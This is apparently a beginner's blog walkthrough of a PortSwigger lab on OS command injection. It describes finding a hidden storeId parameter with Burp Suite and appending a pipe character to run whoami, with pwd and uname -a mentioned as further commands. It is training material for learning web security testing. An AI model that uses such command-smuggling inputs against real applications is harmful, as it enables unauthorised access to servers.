Os Command Injection (Portswigger) : LAB -1 : OS command injection, simple case

Hey folks, how’s going? i hope everybody is okay and doing well. So today we are going to do some labs of OS Command Injection from portswigger. If you don’t know about portswigger i would recommend you all to must visit it if you are beginner in pen-testing. https://portswigger.net/

So we will be discussing all labs of the OS command injection in this document so sit tight and enjoy.

First of all what is OS command injection?

The better question is what is command injection? well a command injection is way by which an attacker can execute arbitrary commands because of improper data processing or some vulnerability. A command injection can lead to various attacks like JavaScript code injection, HTML Template injection, etc. One such attack is OS Command Injection. In which attacker can execute arbitrary OS commands on target Operating System or server where application is deployed.

Okay so let’s get started.

LAB 1 : OS command injection, simple case

This lab contains an OS command injection vulnerability in the product stock checker. The application executes a shell command containing user-supplied product and store IDs, and returns the raw output from the command in its response. To solve the lab, execute the whoami command to determine the name of the current user.

In the lab we have been presented with the web application. which has listed lot of products.As we can see in below picture.

Upon viewing view details of an product we get detail information about that product and we can see upon visiting a specific product a parameter named productId is being set. Well this is where we can try to preform command injection and i did but no luck because it fetches information by using an API which restrict all special characters. But as there is another functionality which allows us check for availability of stocks. As we can see in below picture.

Upon using the functionality to check for stocks we can see that we are getting some results. But we are not getting any changes in parameter. Maybe there is something hidden going on in the request that we are not aware about. This is where the tool burp suite comes in the picture. Burp suite is web proxy tool to analyzing the requests or to modify requests or much more.

As we can see in above picture that when we capture the request of accessing the functionality of stock checker we see a hidden parameter called storeId is being used to fetch information. As we have already tested productId parameter for OS command injection and it is not vulnerable to it, now it is time to check for storeId parameter.

As we capture the request in burp suite now it is time to test OS command injection on the hidden parameter named storeId. We can use an special character to execute multiple commands at once. As we can in above picture that we use a pipe character to execute OS command on back-end server to test command injection. There are many other special characters that we can use like ‘ and & and many more. You can test it by yourself. As we forward the above edited request we can see the result in below picture.

As we can see that our arbitrary command run successfully from above picture. Means we can execute OS command injection.We can also test for some other command like pwd or uname -a or netstate or etc. you can test it by yourself but i have tested one other command pwd as we can see in below picture.

As we forward this request we can see that our command run successfully and given us information about present working directory of target system as we can see in below picture.

And that was it for this lab.

Thank you everyone for taking some time and read it. I hope you have some good knowledge from this. If there is anything you have to say or any doubt you can post it in the comment section.

keep enumerating. Enumeration is the key.

Happy hacking.